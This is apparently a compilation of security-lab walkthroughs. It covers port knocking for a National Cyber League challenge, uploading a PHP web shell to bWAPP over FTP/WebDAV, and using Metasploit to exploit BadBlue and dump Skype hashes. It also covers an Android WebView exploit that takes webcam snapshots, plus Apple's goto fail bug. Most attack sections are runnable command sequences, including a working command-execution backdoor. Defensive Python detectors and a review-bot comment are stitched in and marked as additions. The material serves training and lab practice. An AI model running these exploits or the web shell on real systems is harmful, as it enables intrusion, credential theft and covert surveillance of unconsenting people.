Port Knocking with Knockd and Knock for National Cyber League (NCL)

From Wikipedia “In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s).”[1]

Install the Knockd Service and Client

sudo apt-get install knockd

A challenge may include using the knock client and the default knockd sequence to open a new port or ports. It is recommended that you first scan the host with nmap -sV -p- -T5 [ipaddress]. This will show the currently open port(s) and service/version information. Then try the knockd default sequence: knock -v [ipaddress] 7000 8000 9000.

There will be no immediate indication that a port has opened after knocking; you will have to re-scan and compare the two results to find the newly opened port. More than likely there is a time limit on how long the new port stays open and available for access.

PROTIP: You may have to use “wget” to retrieve the flag. The command wget --no-check-certificate https://webaddress:port may retrieve the page hosted on the open port.
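Added example, not from the original post or from knockd itself: a small Python model of the per-source sequence matching knockd performs on the stock 7000/8000/9000 sequence, run over constructed SYN-attempt records (the kind an iptables LOG rule on closed ports produces), so a defender can see why the window expires and which sources completed the default sequence. The 5-second seq_timeout and the reset-on-any-wrong-port rule are assumptions of this model.

```python
# knockd's stock example config opens a port when one source sends SYNs to
# 7000, 8000, 9000 in order within seq_timeout seconds (assumed 5 s here).
DEFAULT_SEQUENCE = (7000, 8000, 9000)
SEQ_TIMEOUT = 5.0

# Constructed sample of (timestamp, source IP, destination port) SYN attempts,
# e.g. as logged by an iptables LOG rule for closed ports. Not real traffic.
SAMPLE_SYNS = [
    (10.0, "192.168.25.50", 7000),
    (10.4, "192.168.25.50", 8000),
    (10.9, "192.168.25.50", 9000),   # full sequence in 0.9 s: port opens
    (20.0, "192.168.25.77", 7000),
    (27.0, "192.168.25.77", 8000),   # 7 s after the first knock: window expired
    (27.5, "192.168.25.77", 9000),
    (30.0, "192.168.25.88", 7000),
    (30.2, "192.168.25.88", 22),     # out-of-order port resets the sequence
    (30.5, "192.168.25.88", 8000),
    (30.7, "192.168.25.88", 9000),
]

def track_knocks(events, sequence=DEFAULT_SEQUENCE, seq_timeout=SEQ_TIMEOUT):
    """Replay SYN attempts through a per-source state machine modelled on
    knockd's matching (simplified: any wrong port sends the source back to
    the start) and return (source, time) for each completed sequence."""
    progress = {}      # src -> (index of next expected port, time of first knock)
    completed = []
    for ts, src, port in sorted(events):
        idx, started = progress.get(src, (0, ts))
        if idx and ts - started > seq_timeout:
            idx = 0                          # window expired: start over
        if port == sequence[idx]:
            if idx == 0:
                started = ts                 # first knock opens the window
            idx += 1
        else:
            idx, started = 0, ts             # wrong port: sequence resets
        if idx == len(sequence):
            completed.append((src, ts))      # knockd would now run its command
            idx = 0
        progress[src] = (idx, started)
    return completed

def used_default_sequence(events):
    """Sources that completed the stock 7000/8000/9000 sequence, i.e. the
    default config that scanners such as knockdefault.py look for."""
    return sorted({src for src, _ in track_knocks(events, DEFAULT_SEQUENCE)})

if __name__ == "__main__":
    for src, ts in track_knocks(SAMPLE_SYNS):
        print(f"{src} completed the knock sequence at t={ts}")
```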

KnockdEfault Evaluator v1.1 – knock-knock

The two tools in this package are knockdefault.py and knockd_on-off.py. The first of these is a scanner to identify default configs and the latter is a utility to interact with identified vulnerable services.[2]

root@kali:~# git clone https://github.com/hack1thu7ch/knock-knock.git
root@kali:~# cd knock-knock/
root@kali:~# ./setup.sh
root@kali:~# ./knockdefault.py


Web Citations:
[1] http://en.wikipedia.org/wiki/Port_knocking
[2] http://www.shortbus.ninja/default-knockd-cloaking-configurations/

bWAPP: Abusing FTP and WebDav – Uploading Shell

The video shows how to exploit bWAPP through FTP and WebDAV using the Metasploit Framework. Here are the steps:

  • First run nmap and closely verify all the services
  • Run the Metasploit Framework, check WebDAV with the scanner and make sure it is enabled
  • Run FTP, log in and upload your backdoor
  • Access your backdoor through a web browser and get a reverse shell
# msfconsole
msf > search ftp_login
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set USERNAME anonymous
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set RHOSTS 192.168.25.139
msf auxiliary(ftp_login) > exploit

msf auxiliary(ftp_login) > search webdav_scanner
msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > show options
msf auxiliary(webdav_scanner) > set RHOSTS 192.168.25.139
msf auxiliary(webdav_scanner) > set PATH /webdav/
msf auxiliary(webdav_scanner) > exploit

# ftp
ftp> o
(to) 192.168.25.139
Name (192.168.25.139:root): anonymous
Password:

ftp> ls
ftp> put backdoor.php

backdoor.php code:

<?php
// Runs the value of the x query parameter as a shell command and prints
// exec()'s return value, i.e. the last line of the command's output.
print_r(($_GET['x']) ? exec($_GET['x']) : '');
?>

Address Bar:

192.168.25.139/webdav/backdoor.php?x=ls
192.168.25.139/webdav/backdoor.php?x=pwd
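From the detection side, as an added example that is not part of the original video or of bWAPP: the chain above leaves two log traces, an anonymous FTP upload of a .php file into the WebDAV directory and a later HTTP request for that same file carrying a query string. The Python below correlates constructed vsftpd-style and Apache-style log lines to flag that pairing; the log formats, the one-hour window, the UTC assumption and the script-extension list are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample logs (not from the original page): a vsftpd-style
# transfer log and Apache combined-format access log lines, both in UTC.
FTP_LOG = [
    'Tue Mar  4 10:00:01 2014 [pid 2231] [anonymous] OK UPLOAD: Client "192.168.25.1", "/webdav/backdoor.php", 52 bytes, 1.00Kbyte/sec',
    'Tue Mar  4 10:00:05 2014 [pid 2231] [anonymous] OK UPLOAD: Client "192.168.25.1", "/webdav/notes.txt", 120 bytes, 2.00Kbyte/sec',
]
WEB_LOG = [
    '192.168.25.1 - - [04/Mar/2014:10:00:20 +0000] "GET /webdav/backdoor.php?x=ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.25.1 - - [04/Mar/2014:10:00:25 +0000] "GET /webdav/notes.txt HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '192.168.25.1 - - [04/Mar/2014:13:00:00 +0000] "GET /webdav/backdoor.php?x=pwd HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]

FTP_RE = re.compile(r'^(?P<when>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                    r'\[(?P<user>[^\]]+)\] OK UPLOAD: Client "(?P<src>[^"]+)", "(?P<path>[^"]+)"')
WEB_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] "(?P<method>\S+) '
                    r'(?P<path>[^? ]+)(?P<query>\?\S*)? [^"]*" (?P<status>\d{3})')
# Extensions the web server hands to an interpreter instead of serving as data.
SCRIPT_EXTENSIONS = ('.php', '.phtml', '.php5', '.asp', '.aspx', '.jsp')

def parse_ftp_upload(line):
    """(time, ftp user, client IP, stored path) for an OK UPLOAD line, else None."""
    m = FTP_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m['when'].replace('  ', ' '), '%a %b %d %H:%M:%S %Y')
    return when, m['user'], m['src'], m['path']

def parse_web_request(line):
    """(time, client IP, path, query string, status) for an access-log line, else None."""
    m = WEB_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(m['when'], '%d/%b/%Y:%H:%M:%S %z').replace(tzinfo=None)
    return when, m['src'], m['path'], m['query'] or '', int(m['status'])

def find_uploaded_shells(ftp_lines, web_lines, window_hours=1.0):
    """Script uploaded over FTP, then requested over HTTP with a query string inside the window."""
    window = timedelta(hours=window_hours)
    uploads = [u for u in map(parse_ftp_upload, ftp_lines)
               if u and u[3].lower().endswith(SCRIPT_EXTENSIONS)]
    hits = []
    for when, src, path, query, status in filter(None, map(parse_web_request, web_lines)):
        for up_when, user, up_src, up_path in uploads:
            if path == up_path and query and up_when <= when <= up_when + window:
                hits.append((up_path, user, src, when.isoformat()))
    return hits
```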

Post Exploitation: Dump Skype Hash with Metasploit using BadBlue httpd 2.7

The video shows how to dump Skype hashes using the Metasploit Framework and BadBlue httpd 2.7. Here are the steps:

  • Exploit a Windows 8 machine using BadBlue httpd 2.7
  • Use the Skype post-exploitation module to dump the hashes
  • Crack the MD5 hashes, as you will not get plain-text password(s)
nmap -sS -sV 192.168.25.129

msf > use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > set RHOST 192.168.25.129
msf exploit(badblue_passthru) > exploit

meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > background

msf exploit(badblue_passthru) > search skype
msf exploit(badblue_passthru) > use post/windows/gather/credentials/skype

msf post(skype) > set SESSION 2
msf post(skype) > exploit

Exploit Android via WebView addJavascriptInterface Code Execution

“What I am going to show you today is that this phone is nominally not vulnerable … can become vulnerable quite easily just downloading fairly popular Apps from Google Play Store” said Tod Beardsley – Pirate Captain for Metasploit Framework, Rapid7. The sound advice of never sideloading apps and always going through the Play Store because it is ‘safe’ is not always true; case in point:

msfconsole
use exploit/android/browser/webview_addjavascriptinterface
info
show options
set LHOST <ip address>
exploit

By downloading an aftermarket browser from the Google Play Store [in the video the app is called “Marathon Browser”] and viewing a specially crafted web page, the phone could be hacked and give up a meterpreter session. “Effectively this browser is a backdoor into my phone” explained Beardsley. The situation is critical: nearly 70 percent of Android-based handsets are vulnerable because they run Android versions prior to 4.2.

sessions -i
sessions -i 1
ls 
cd /sdcard

While you only have the permissions of the browser, you can still do a lot with the browser's current user rights, including using the camera.

webcam_list
webcam_snap 1

“This module exploits a privilege escalation issue in Android < 4.2’s WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection APIs exposed by the Interface and execute arbitrary commands. Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs 4.1.2 release of Android is known to be vulnerable. A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here. If you can MITM the WebView’s HTTP connection, or if you can get a persistent XSS into the page displayed in the WebView, then you can inject the html/js served by this module and get a shell. Note: Adding a .js to the URL will return plain javascript (no HTML markup).”
source: http://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface

goto Fail screenshots for iPhone

At the end of last week, Apple pushed iOS 7.0.6, fixing a “data security” problem.

Impact: An attacker with a privileged network position may capture or modify data in sessions protected by SSL/TLS

Description: Secure Transport failed to validate the authenticity of the connection. This issue was addressed by restoring missing validation steps.

CVE-ID CVE-2014-1266

[Screenshots goto-fail-01 through goto-fail-07]

$ diff -urN <(curl -s http://opensource.apple.com/source/Security/Security-55179.13/libsecurity_ssl/lib/sslKeyExchange.c\?txt) \
    <(curl -s http://opensource.apple.com/source/Security/Security-55471/libsecurity_ssl/lib/sslKeyExchange.c\?txt) \
    | grep -A 7 627,6
@@ -627,6 +628,7 @@
         goto fail;
     if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
         goto fail;
+        goto fail;
     if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
         goto fail;
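Review bot: the added `goto fail;` right after the `SSLHashSHA1.update(&hashCtx, &signedParams)` check is not guarded by any `if`, so it runs unconditionally: the `SSLHashSHA1.final` check on the two context lines that follow is never reached, and since `err` still holds the 0 returned by the successful `update` call, the jump to `fail` reports success without the hash ever being finished. A duplicated `goto` at the same indentation as its guarded twin is exactly what an unreachable-code warning (clang's `-Wunreachable-code`) or a braces-on-every-`if` style rule would have caught; suggest deleting the duplicate line and requiring braces around every `if` body in this function so a stray line cannot silently escape its condition.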